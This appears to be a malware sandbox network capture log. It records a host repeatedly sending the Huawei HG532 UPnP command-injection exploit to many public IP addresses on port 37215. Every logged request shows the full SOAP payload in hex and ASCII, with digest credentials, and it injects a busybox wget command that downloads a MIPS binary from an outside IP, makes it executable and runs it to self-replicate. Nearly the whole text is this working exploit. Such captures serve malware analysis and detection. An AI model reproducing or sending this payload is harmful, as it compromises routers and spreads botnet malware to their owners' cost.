                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1521192.168.2.233464241.227.223.9737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.545267105 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1522192.168.2.234873241.240.0.22437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.545269012 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1523192.168.2.235029837.22.22.4937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.545295000 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1524192.168.2.2339718157.25.64.3137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.545295000 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1525192.168.2.2346220197.240.205.21437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546488047 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1526192.168.2.235976641.116.233.18337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546489954 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1527192.168.2.2359620197.53.252.23537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546525002 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1528192.168.2.2356064197.56.142.3937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546533108 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1529192.168.2.235265841.117.143.19837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546552896 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1530192.168.2.2333958197.17.198.13637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546555996 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
